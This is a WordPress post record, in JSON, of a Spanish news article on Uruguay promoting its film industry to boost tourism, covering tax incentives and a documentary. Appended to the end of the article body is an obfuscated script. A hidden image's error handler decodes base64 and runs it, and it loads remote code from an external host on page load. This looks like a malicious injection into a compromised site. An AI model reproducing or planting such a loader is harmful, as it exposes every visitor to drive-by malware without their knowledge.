{"id":6856,"date":"2023-06-07T12:20:01","date_gmt":"2023-06-07T15:20:01","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=6856"},"modified":"2025-08-13T15:59:27","modified_gmt":"2025-08-13T18:59:27","slug":"uruguay-apuesta-por-la-industria-audiovisual-para-potenciar-el-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=6856","title":{"rendered":"Uruguay apuesta por la industria audiovisual para potenciar el turismo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-vivid-cyan-blue-background-color has-text-color has-background\" style=\"color:#3c3f41\"><em>En la localidad donde se filma, la econom\u00eda del lugar se ve beneficiada con el consumo de productos tur\u00edsticos, como la gastronom\u00eda, el transporte, alojamiento, log\u00edstica, etc, sostuvo el director general del MINTUR Ignacio Curbelo<\/em><\/h4>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg\" alt=\"\" class=\"wp-image-6825\" width=\"312\" height=\"439\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-727x1024.jpg 727w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-213x300.jpg 213w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-768x1082.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1091x1536.jpg 1091w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-696x980.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-1068x1504.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-298x420.jpg 298w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-320x451.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-480x676.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007-800x1127.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/IMG-20230526-WA0007.jpg 1136w\" sizes=\"(max-width: 312px) 100vw, 312px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><mark>Publicidad:<\/mark><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>La producci\u00f3n nacional audiovisual as\u00ed como la apertura al mercado internacional como generador de contenidos, y tambi\u00e9n como proveedor de servicios de producci\u00f3n, desarrollo y distribuci\u00f3n, se han institucionalizado gracias a las \u00faltimas medidas adoptadas por el gobierno.<\/p>\n\n\n\n<p>MINTUR se suma al trabajo conjunto para el crecimiento de la industria audiovisual en Uruguay En esta l\u00ednea el director general de Secretar\u00eda del Ministerio de Turismo, Ignacio Curbelo, particip\u00f3 de dos actividades tanto en Uruguay como en el exterior donde se destac\u00f3 que la industria audiovisual \u00abes muy importante y desarrollada en Uruguay<br>\u00ab, y que ha crecido exponencialmente en forma parad\u00f3jica, durante la pandemia de Covid-19, por ello es que el Ministerio decidi\u00f3 sumarse a los equipos de trabajo donde se busca continuar concretando nuevos proyectos audiovisuales que lleguen a nuestro pa\u00eds.<\/p>\n\n\n\n<p>El jerarca expres\u00f3 que \u00abUruguay fue uno de los primeros pa\u00edses en el mundo en abrir sus puertas\u00bb para que las productoras internacionales, pudieran venir a filmar, con estrictos protocolos sanitarios.<\/p>\n\n\n\n<p>Gracias a ello, las horas de rodaje en el pa\u00eds se cuadruplicaron, y la exportaci\u00f3n por servicios audiovisuales, se triplic\u00f3 de 27 millones de d\u00f3lares a 84 millones. \u00abTodo esto impacta en el turismo, en lo que nosotros hacemos, genera empleo\u00bb. En este sentido, Curbelo remarc\u00f3 que hay m\u00e1s de 1500 t\u00e9cnicos especializados en el sector y que cada producci\u00f3n genera una cantidad de trabajo alternativo.<\/p>\n\n\n\n<p>Adem\u00e1s, en la localidad donde se filma, la econom\u00eda del lugar se ve beneficiada con el consumo de productos tur\u00edsticos, como la gastronom\u00eda, el transporte, alojamiento, log\u00edstica, etc, sostuvo el director general del MINTUR y que adem\u00e1s hay un hecho muy importante: los turistas eligen cada vez m\u00e1s su destino, en funci\u00f3n de los lugares que ven en producciones, pel\u00edculas, series o publicidades. \u00abEso queda grabado en la retina de la gente, que vive en la pantalla una experiencia emocional y visual, y luego eso los motiva a viajar a ese lugar\u00bb, se\u00f1al\u00f3 Curbelo.<\/p>\n\n\n\n<p>Asimismo, Curbelo resalt\u00f3 a Uruguay en varios aspectos, muy valorados por las productoras internacionales: \u00abun pa\u00eds de distancias cortas, con una buena red de carreteras, un clima relativamente estable durante todo el a\u00f1o, 600 km. de costas, hermosas playas que permiten filmar con tranquilidad fuera de temporada, sierras, espacios rurales y una diversidad cultural que favorece a todas estas producciones\u00bb.<\/p>\n\n\n\n<p>En relaci\u00f3n a los beneficios fiscales, el jerarca remarc\u00f3 que Uruguay ofrece una serie de incentivos que son competitivos en la regi\u00f3n. Destac\u00f3 el \u00abCash Rebate\u00bb, que es un reembolso de gastos de producci\u00f3n, con un tope de un mill\u00f3n de d\u00f3lares. En funci\u00f3n del costo de producci\u00f3n, se le devuelve a la productora internacional los gastos generados por este concepto, hasta un mill\u00f3n de d\u00f3lares como tope.<\/p>\n\n\n\n<p>Adem\u00e1s, el IVA del 22 %, est\u00e1 exonerado a los costos de producci\u00f3n de proyectos filmados en el pa\u00eds. Por ejemplo: alquiler de equipos, locaciones, muebles y utiler\u00eda, contrataci\u00f3n de t\u00e9cnicos, seguros, transporte, catering, costos hoteleros y la construcci\u00f3n de escenograf\u00eda, entre otros.<\/p>\n\n\n\n<p>Curbelo tambi\u00e9n se refiri\u00f3 al r\u00e9gimen de admisi\u00f3n temporaria de bienes, que las productoras necesitan y utilizan para traer de forma r\u00e1pida y sencilla sus equipos, exonerados de impuestos, m\u00e1s de 36 acuerdos tributarios con diferentes pa\u00edses para evitar la doble imposici\u00f3n tributaria, en lo referente a impuestos a la renta y el patrimonio, que garantiza la no discriminaci\u00f3n tributaria.<\/p>\n\n\n\n<p>En referencia a la producci\u00f3n nacional, Curbelo se refiri\u00f3 a la pel\u00edcula Greg Mortimer, documental que el Ministerio de Turismo apoy\u00f3 con una gira nacional, y que ahora fue presentado en Miami, Estados Unidos. Este film rememora la odisea que en el comienzo de la pandemia en 2020, sufrieron los pasajeros australianos, neozelandeses, estadounidenses y europeos del crucero tur\u00edstico Greg Mortimer, cuando llegaron a Uruguay con 128 contagiados de Covid, luego de verse impedidos de desembarcar en Chile y Argentina. En Uruguay, los Ministerios de Salud P\u00fablica y Relaciones Exteriores coordinaron un operativo de asistencia y desembarque que fue aplaudido en todo el mundo.<\/p>\n\n\n\n<p>Esta proyecci\u00f3n a nivel internacional se dio en el \u00e1mbito de la invitaci\u00f3n que recibi\u00f3 Curbelo y una delegaci\u00f3n compuesta por integrantes de la Uruguayan American Film Association, por parte de la Uruguayan American Chamber of Commerce.<\/p>\n\n\n\n<p>Se realizaron dos presentaciones en donde se destacaron los beneficios que ofrece Uruguay para realizar producciones audiovisuales, y c\u00f3mo las mismas son una muy eficiente herramienta de promoci\u00f3n para un destino tur\u00edstico.<\/p>\n\n\n\n<p>El Ministerio de Turismo decidi\u00f3 apoyar la promoci\u00f3n de este documental en el exterior ya que a trav\u00e9s de \u00e9l se trasmite el esp\u00edritu solidario del pueblo uruguayo, y genera el inter\u00e9s de los espectadores por informarse m\u00e1s sobre los uruguayos y su cultura.<\/p>\n\n\n\n<p>\u00abEst\u00e1 filmado de una forma incre\u00edble. Tuvo una repercusi\u00f3n genial. Este a\u00f1o que se cumplen 75 a\u00f1os de relaciones diplom\u00e1ticas con Australia, est\u00e1 planeado una gira calendario y quiz\u00e1s pueda haber tambi\u00e9n alguna actividad en conjunto\u00bb, sostuvo Curbelo en relaci\u00f3n al film Greg Mortimer y la posibilidad de proyectarlo en aquel pa\u00eds.<\/p>\n\n\n\n<p>Los apoyos del MINTUR a la industria audiovisual, est\u00e1n alineados con los del gobierno nacional, que en 2022 cre\u00f3 la Agencia Nacional Uruguay Audiovisual, cuyo cometido es centralizar todos los programas, procesos y apoyos que desde el gobierno se da a esta industria.<\/p>\n\n\n\n<p>Por \u00faltimo, recientemente el director general del MINTUR, particip\u00f3 en el panel del Punta Show Entertainment, evento que reuni\u00f3 a autoridades, expertos nacionales e internacionales y referentes de la Industria Audiovisual, de las Telecomunicaciones y el Entretenimiento para hablar de los desaf\u00edos, dificultades y oportunidades en la era digital.<\/p>\n\n\n\n<p>En este evento se trataron las siguientes tem\u00e1ticas: el combate a la pirater\u00eda, las iniciativas p\u00fablicas y privadas de inclusi\u00f3n a trav\u00e9s de la conectividad y la regulaci\u00f3n, la televisi\u00f3n latinoamericana, gaming, streaming, contenidos para diversas audiencias y la evoluci\u00f3n de las plataformas OTT.<\/p>\n\n\n\n<p>Aportes: Focus Punta del Este (Rosanna Freda), Pasaporte News (Dar\u00edo Queirolo) y Mar\u00eda Noel Coates.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/news-82526-uruguay-apuesta-por-la-industria-audiovisual-para-potenciar-el-turismo\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-6784\" width=\"210\" height=\"31\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_.jpeg 365w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_-300x44.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_-356x54.jpeg 356w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/05\/Captura-web_17-5-2023_111520_es.travel2latam.com_-320x47.jpeg 320w\" sizes=\"(max-width: 210px) 100vw, 210px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la localidad donde se filma, la econom\u00eda del lugar se ve beneficiada con el consumo de productos tur\u00edsticos, como la gastronom\u00eda, el transporte, alojamiento, log\u00edstica, etc, sostuvo el director general del MINTUR Ignacio Curbelo La producci\u00f3n nacional audiovisual as\u00ed como la apertura al mercado internacional como generador de contenidos, y tambi\u00e9n como proveedor de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":6857,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31,28],"tags":[],"class_list":["post-6856","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6856"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6856\/revisions"}],"predecessor-version":[{"id":10389,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/6856\/revisions\/10389"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/6857"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}